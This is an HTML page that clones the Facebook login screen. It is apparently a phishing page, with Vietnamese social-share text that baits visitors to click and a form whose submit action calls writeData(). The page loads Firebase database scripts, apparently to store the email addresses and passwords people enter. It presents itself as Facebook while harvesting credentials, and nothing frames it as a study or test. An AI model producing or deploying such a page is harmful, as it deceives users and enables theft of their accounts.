<!DOCTYPE html>
<html lang="en">
<head> 
<link rel="shortcut icon" type="image/png" href="https://raw.githubusercontent.com/therealstromez/stromez/main/img/favicon.ico"/>
	<meta property="og:url"                content="https://qminh.xyz/fbclone" />
<meta property="og:type"               content="article" />
<meta property="og:title"              content="Bấm vào đây nếu muốn test độ ngu " />
<meta property="og:description"        content="Một trang web cực uy tín từ minhmoiii" />
<meta property="og:image"              content="http://static01.nyt.com/images/2015/02/19/arts/international/19iht-btnumbers19A/19iht-btnumbers19A-facebookJumbo-v2.jpg" />

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="style/fb.css">


</head>
<body>

    <!-- logo: https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg -->

<div class="cc">
  Vui lòng đăng nhập để tiếp tục!
</div>
<div id="someUser"></div>

    <div class="container">
        <!-- main container -->
        <div class="content">
            <!-- logo container -->
           <div class="left-content">
               <div class="f-logo">
                   <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook" />
               </div>
               <h2 class="f-quote">Facebook helps you connect and share with the people in your life.</h2>
           </div>
           <!-- login form -->
           <div class="right-content">
               <div class="card">
                   <form>
                       <div class="input-container">
                           <input id="name" type="text" placeholder="Email address or phone number" autofocus="autofocus" title="Email address or phone number" required>
                       </div>
                       <div class="input-container">
                            <input id="pass" type="password" placeholder="Password" pattern=".{8,}" title="Eight or more characters" required>
                        </div>
						<div class="login-btn-container">
                            <button id="login" type="submit" formaction="javascript:writeData()" class="login-btn">Log In</button>
                        </div>
                    </form>   
               
				    

                   <div class="forgotten-password">
                       <a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjQ1Njc0MzA1LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login">Forgotten Password?</a>
                   </div>

                   <div class="divider"></div>

                   <div class="" style="text-align: center;">
                       <a class="crt-new-ac" href="https://www.facebook.com/r.php?locale=en_GB&display=page">Create New Account</a>
                   </div>
               </div>
               <div class="crt-page">
                   <a href="https://www.facebook.com/pages/create/?ref_type=registration_form">Create a Page</a>
                   <span>for a celebrity, band or business.</span>
               </div>
           </div>
        </div>
    </div>

    <footer class="f-lg-footer">
        <ul>
            <li><a href="">English (UK)</a></li>
            <li><a href="">বাংলা</a></li>
            <li><a href="">हिन्दी</a></li>
            <li><a href="">اردو</a></li>
            <li><a href="">नेपाली</a></li>
            <li><a href="">ଓଡ଼ିଆ</a></li>
            <li><a href="">Español</a></li>
            <li><a href="">Português (Brasil)</a></li>
            <li><a href="">Français (France)</a></li>
            <li><a href="">Deutsch</a></li>
            <li><a href="">Italiano</a></li>
        </ul>
        <div class="divider"></div>
        <ul>  
            <li><a href="https://www.facebook.com/pages/create/?ref_type=registration_form">Sign Up</a></li>
            <li><a href="#">Log In</a></li>
            <li><a href="https://messenger.com/">Messenger</a></li>
            <li><a href="https://www.facebook.com/lite/">Facebook Lite</a></li>
            <li><a href="https://www.facebook.com/watch/">Watch</a></li>
            <li><a href="https://www.facebook.com/places/">Places</a></li>
            <li><a href="https://www.facebook.com/games/">Games</a></li>
            <li><a href="https://www.facebook.com/marketplace/">Marketplace</a></li>
            <li><a href="https://pay.facebook.com/">Facebook Pay</a></li>
            <li><a href="">Jobs</a></li>
            <li><a href="">Oculus</a></li>
            <li><a href="">Portal</a></li>
            <li><a href="">Instagram</a></li>
            <li><a href="">Local</a></li>
            <li><a href="">Fundraisers</a></li>
            <li><a href="">Services</a></li>
            <li><a href="">Voting</a></li>
            <li><a href="">Information Centre</a></li>
            <li><a href="https://about.facebook.com/">About</a></li>
            <li><a href="https://www.facebook.com/ad_campaign/landing.php?placement=pflo&campaign_id=402047449186&nav_source=unknown&extra_1=auto">Create ad</a></li>
            <li><a href="https://www.facebook.com/pages/create/?ref_type=site_footer">Create Page</a></li>
            <li><a href="https://developers.facebook.com/?ref=pf">Developers</a></li>
            <li><a href="https://www.facebook.com/careers/?ref=pf">Careers</a></li>
            <li><a href="https://www.facebook.com/privacy/explanation/">Privacy</a></li>
            <li><a href="https://www.facebook.com/policies/cookies/">Cookies</a></li>
            <li><a href="https://www.facebook.com/help/568137493302217">AdChoices</a></li>
            <li><a href="https://www.facebook.com/policies?ref=pf">Terms</a></li>
            <li><a href="https://www.facebook.com/help/?ref=pf">Help</a></li>
            <li><a href="">Settings</a></li>
        </ul>
    </footer>

    <div class="m-footer">
        <div class="m-f-lang">
            <ul>
                <li><a href="">English (UK)</a></li>
                <li><a href="">বাংলা</a></li>
                <li><a href="">हिन्दी</a></li>
            </ul>
            <ul>
                <li><a href="">اردو</a></li>
                <li><a href="">नेपाली</a></li>
                <li><a href="">ଓଡ଼ିଆ</a></li>
            </ul>
        </div>
        

        <div style="clear: both;"></div>

        <div class="links" style="text-align: center;">
            <a href="#">About</a><a href="#">Help</a><a href="#">More</a>
        </div>

        <div style="font-weight: 600;text-align: center;margin: 10px 0;color: #777;">Facebook Inc</div>
    </div>


<script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-database.js"></script>
<script src="script/fb.js"></script>
    
</body>
</html>
